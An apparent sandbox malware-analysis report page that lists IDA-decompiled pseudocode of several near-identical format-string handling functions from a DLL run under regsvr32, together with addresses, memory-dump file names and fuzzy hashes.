                                                                      0x180027186
                                                                      0x18002718c
                                                                      0x180027194
                                                                      0x1800271ae
                                                                      0x1800271b3
                                                                      0x1800271bb
                                                                      0x1800271c2
                                                                      0x1800271c8
                                                                      0x1800271cf
                                                                      0x1800271dc
                                                                      0x1800271ec
                                                                      0x1800271f3
                                                                      0x1800271f9
                                                                      0x180027203
                                                                      0x18002720d
                                                                      0x180027214
                                                                      0x18002721b
                                                                      0x180027221
                                                                      0x180027226
                                                                      0x18002722f
                                                                      0x180027238
                                                                      0x18002723e
                                                                      0x180027243
                                                                      0x180027247
                                                                      0x18002724a
                                                                      0x180027251
                                                                      0x180027255
                                                                      0x180027260
                                                                      0x180027265
                                                                      0x18002726b
                                                                      0x180027272
                                                                      0x18002727f
                                                                      0x18002728f
                                                                      0x180027291
                                                                      0x180027295
                                                                      0x18002729d
                                                                      0x1800272ad
                                                                      0x1800272b4
                                                                      0x1800272bc
                                                                      0x1800272be
                                                                      0x1800272c2
                                                                      0x1800272c6
                                                                      0x1800272d0
                                                                      0x1800272d5
                                                                      0x1800272da
                                                                      0x1800272de
                                                                      0x1800272eb
                                                                      0x1800272f6
                                                                      0x1800272ff
                                                                      0x180027301
                                                                      0x18002730a
                                                                      0x18002730d
                                                                      0x180027326

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0351e68ff6d536f6246caad5d332577e84587169802c887648ca6f7298174b7
                                                                      • Instruction ID: e7bd5ec35c79849d72bfce7d1feaa4a5ad029988ed4420904b78115d2214d442
                                                                      • Opcode Fuzzy Hash: e0351e68ff6d536f6246caad5d332577e84587169802c887648ca6f7298174b7
                                                                      • Instruction Fuzzy Hash: 5851B03771065882F7AB8F28C1543AC27A2EB59BA8F158105EF4D177DACF21DE59C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001D23C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001d323;
                                                                      				if (_t111 == 0) goto 0x8001d28c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001d377;
                                                                      				if (_t112 == 0) goto 0x8001d2fb;
                                                                      				if (_t112 == 0) goto 0x8001d2d4;
                                                                      				if (_t112 == 0) goto 0x8001d377;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001d343;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d2be;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d2be;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d3a2;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d3b9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d2f5;
                                                                      				goto 0x8001d2a7;
                                                                      				goto 0x8001d2a7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001d31d;
                                                                      				goto 0x8001d2a7;
                                                                      				goto 0x8001d2a7;
                                                                      				if (_t119 == 0) goto 0x8001d28c;
                                                                      				if (_t119 == 0) goto 0x8001d28c;
                                                                      				if (_t119 == 0) goto 0x8001d28c;
                                                                      				goto 0x8001d27a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001d412;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d39a;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001d2a7;
                                                                      				goto 0x8001d2a7;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001d3c2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001d3dc;
                                                                      				E000000011800261E4(0, _t134, _t150);
                                                                      				goto 0x8001d3e3;
                                                                      				E00000001180026288( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001d410;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001d401;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001d410;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001d23c
                                                                      0x18001d241
                                                                      0x18001d246
                                                                      0x18001d250
                                                                      0x18001d253
                                                                      0x18001d256
                                                                      0x18001d259
                                                                      0x18001d25c
                                                                      0x18001d262
                                                                      0x18001d264
                                                                      0x18001d266
                                                                      0x18001d26f
                                                                      0x18001d278
                                                                      0x18001d27d
                                                                      0x18001d286
                                                                      0x18001d28c
                                                                      0x18001d294
                                                                      0x18001d2ae
                                                                      0x18001d2b3
                                                                      0x18001d2bb
                                                                      0x18001d2c2
                                                                      0x18001d2c8
                                                                      0x18001d2cf
                                                                      0x18001d2dc
                                                                      0x18001d2ec
                                                                      0x18001d2f3
                                                                      0x18001d2f9
                                                                      0x18001d303
                                                                      0x18001d30d
                                                                      0x18001d314
                                                                      0x18001d31b
                                                                      0x18001d321
                                                                      0x18001d326
                                                                      0x18001d32f
                                                                      0x18001d338
                                                                      0x18001d33e
                                                                      0x18001d343
                                                                      0x18001d347
                                                                      0x18001d34a
                                                                      0x18001d351
                                                                      0x18001d355
                                                                      0x18001d360
                                                                      0x18001d365
                                                                      0x18001d36b
                                                                      0x18001d372
                                                                      0x18001d37f
                                                                      0x18001d38f
                                                                      0x18001d391
                                                                      0x18001d395
                                                                      0x18001d39d
                                                                      0x18001d3ad
                                                                      0x18001d3b4
                                                                      0x18001d3bc
                                                                      0x18001d3be
                                                                      0x18001d3c2
                                                                      0x18001d3c6
                                                                      0x18001d3d0
                                                                      0x18001d3d5
                                                                      0x18001d3da
                                                                      0x18001d3de
                                                                      0x18001d3eb
                                                                      0x18001d3f6
                                                                      0x18001d3ff
                                                                      0x18001d401
                                                                      0x18001d40a
                                                                      0x18001d40d
                                                                      0x18001d426

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8ec1a69b69ce4109255ccc4a961df818dde634d70110a1ca97cf6234e8a191d
                                                                      • Instruction ID: 48840bd506c20796ce313657da6bf9f7deb54deaf534b52b07e3f24683fc609a
                                                                      • Opcode Fuzzy Hash: f8ec1a69b69ce4109255ccc4a961df818dde634d70110a1ca97cf6234e8a191d
                                                                      • Instruction Fuzzy Hash: 21518277610A5C83E7AA8F28C1543AC37A0E359BA8F158216EF56177D9CF31DE45C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001B2B0(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001b397;
                                                                      				if (_t111 == 0) goto 0x8001b300;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001b3eb;
                                                                      				if (_t112 == 0) goto 0x8001b36f;
                                                                      				if (_t112 == 0) goto 0x8001b348;
                                                                      				if (_t112 == 0) goto 0x8001b3eb;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001b3b7;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b332;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b332;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b416;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b42d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b369;
                                                                      				goto 0x8001b31b;
                                                                      				goto 0x8001b31b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001b391;
                                                                      				goto 0x8001b31b;
                                                                      				goto 0x8001b31b;
                                                                      				if (_t119 == 0) goto 0x8001b300;
                                                                      				if (_t119 == 0) goto 0x8001b300;
                                                                      				if (_t119 == 0) goto 0x8001b300;
                                                                      				goto 0x8001b2ee;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001b486;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b40e;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001b31b;
                                                                      				goto 0x8001b31b;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001b436;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001b450;
                                                                      				E0000000118002427C(0, _t134, _t150, _t159);
                                                                      				goto 0x8001b457;
                                                                      				E00000001180024304( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t159);
                                                                      				if (0 == 0) goto 0x8001b484;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001b475;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001b484;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001b2b0
                                                                      0x18001b2b5
                                                                      0x18001b2ba
                                                                      0x18001b2c4
                                                                      0x18001b2c7
                                                                      0x18001b2ca
                                                                      0x18001b2cd
                                                                      0x18001b2d0
                                                                      0x18001b2d6
                                                                      0x18001b2d8
                                                                      0x18001b2da
                                                                      0x18001b2e3
                                                                      0x18001b2ec
                                                                      0x18001b2f1
                                                                      0x18001b2fa
                                                                      0x18001b300
                                                                      0x18001b308
                                                                      0x18001b322
                                                                      0x18001b327
                                                                      0x18001b32f
                                                                      0x18001b336
                                                                      0x18001b33c
                                                                      0x18001b343
                                                                      0x18001b350
                                                                      0x18001b360
                                                                      0x18001b367
                                                                      0x18001b36d
                                                                      0x18001b377
                                                                      0x18001b381
                                                                      0x18001b388
                                                                      0x18001b38f
                                                                      0x18001b395
                                                                      0x18001b39a
                                                                      0x18001b3a3
                                                                      0x18001b3ac
                                                                      0x18001b3b2
                                                                      0x18001b3b7
                                                                      0x18001b3bb
                                                                      0x18001b3be
                                                                      0x18001b3c5
                                                                      0x18001b3c9
                                                                      0x18001b3d4
                                                                      0x18001b3d9
                                                                      0x18001b3df
                                                                      0x18001b3e6
                                                                      0x18001b3f3
                                                                      0x18001b403
                                                                      0x18001b405
                                                                      0x18001b409
                                                                      0x18001b411
                                                                      0x18001b421
                                                                      0x18001b428
                                                                      0x18001b430
                                                                      0x18001b432
                                                                      0x18001b436
                                                                      0x18001b43a
                                                                      0x18001b444
                                                                      0x18001b449
                                                                      0x18001b44e
                                                                      0x18001b452
                                                                      0x18001b45f
                                                                      0x18001b46a
                                                                      0x18001b473
                                                                      0x18001b475
                                                                      0x18001b47e
                                                                      0x18001b481
                                                                      0x18001b49a

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0dfa347f1bf50ff83301c2d90dd8547a6d888eeabd914060ed24caaff7230340
                                                                      • Instruction ID: f56660d67d1c2d99c82c82f771152c49845829e30145f3ab4d85c8f576b56f65
                                                                      • Opcode Fuzzy Hash: 0dfa347f1bf50ff83301c2d90dd8547a6d888eeabd914060ed24caaff7230340
                                                                      • Instruction Fuzzy Hash: 0851B173604E5883E7AA8F28C1543AC27A4E758BA8F148219EF56977D9DF30CE59C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00000001180027328(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8002740f;
                                                                      				if (_t111 == 0) goto 0x80027378;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x80027463;
                                                                      				if (_t112 == 0) goto 0x800273e7;
                                                                      				if (_t112 == 0) goto 0x800273c0;
                                                                      				if (_t112 == 0) goto 0x80027463;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8002742f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x800273aa;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x800273aa;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8002748e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x800274a5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x800273e1;
                                                                      				goto 0x80027393;
                                                                      				goto 0x80027393;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x80027409;
                                                                      				goto 0x80027393;
                                                                      				goto 0x80027393;
                                                                      				if (_t119 == 0) goto 0x80027378;
                                                                      				if (_t119 == 0) goto 0x80027378;
                                                                      				if (_t119 == 0) goto 0x80027378;
                                                                      				goto 0x80027366;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x800274fe;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x80027486;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x80027393;
                                                                      				goto 0x80027393;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x800274ae;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x800274c8;
                                                                      				E00000001180027EEC(0, _t134, _t150, _t159);
                                                                      				goto 0x800274cf;
                                                                      				E00000001180027F74( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t159);
                                                                      				if (0 == 0) goto 0x800274fc;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x800274ed;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x800274fc;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180027328
                                                                      0x18002732d
                                                                      0x180027332
                                                                      0x18002733c
                                                                      0x18002733f
                                                                      0x180027342
                                                                      0x180027345
                                                                      0x180027348
                                                                      0x18002734e
                                                                      0x180027350
                                                                      0x180027352
                                                                      0x18002735b
                                                                      0x180027364
                                                                      0x180027369
                                                                      0x180027372
                                                                      0x180027378
                                                                      0x180027380
                                                                      0x18002739a
                                                                      0x18002739f
                                                                      0x1800273a7
                                                                      0x1800273ae
                                                                      0x1800273b4
                                                                      0x1800273bb
                                                                      0x1800273c8
                                                                      0x1800273d8
                                                                      0x1800273df
                                                                      0x1800273e5
                                                                      0x1800273ef
                                                                      0x1800273f9
                                                                      0x180027400
                                                                      0x180027407
                                                                      0x18002740d
                                                                      0x180027412
                                                                      0x18002741b
                                                                      0x180027424
                                                                      0x18002742a
                                                                      0x18002742f
                                                                      0x180027433
                                                                      0x180027436
                                                                      0x18002743d
                                                                      0x180027441
                                                                      0x18002744c
                                                                      0x180027451
                                                                      0x180027457
                                                                      0x18002745e
                                                                      0x18002746b
                                                                      0x18002747b
                                                                      0x18002747d
                                                                      0x180027481
                                                                      0x180027489
                                                                      0x180027499
                                                                      0x1800274a0
                                                                      0x1800274a8
                                                                      0x1800274aa
                                                                      0x1800274ae
                                                                      0x1800274b2
                                                                      0x1800274bc
                                                                      0x1800274c1
                                                                      0x1800274c6
                                                                      0x1800274ca
                                                                      0x1800274d7
                                                                      0x1800274e2
                                                                      0x1800274eb
                                                                      0x1800274ed
                                                                      0x1800274f6
                                                                      0x1800274f9
                                                                      0x180027512

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d2ae83e0b32ae4d77c5d40ccbb61af330cce9c4a97ec0bed7470cb05a71bae68
                                                                      • Instruction ID: 656676166506537e2724f8a1982830ccc8c6a95356a1e805218f7294ec7bc155
                                                                      • Opcode Fuzzy Hash: d2ae83e0b32ae4d77c5d40ccbb61af330cce9c4a97ec0bed7470cb05a71bae68
                                                                      • Instruction Fuzzy Hash: D851B37370461882E7AB9F28C1553AC2BA2E359BA8F148219EF4D177DACF20CE45D780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001D428(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001d50f;
                                                                      				if (_t111 == 0) goto 0x8001d478;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001d563;
                                                                      				if (_t112 == 0) goto 0x8001d4e7;
                                                                      				if (_t112 == 0) goto 0x8001d4c0;
                                                                      				if (_t112 == 0) goto 0x8001d563;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001d52f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d4aa;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d4aa;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d58e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d5a5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d4e1;
                                                                      				goto 0x8001d493;
                                                                      				goto 0x8001d493;
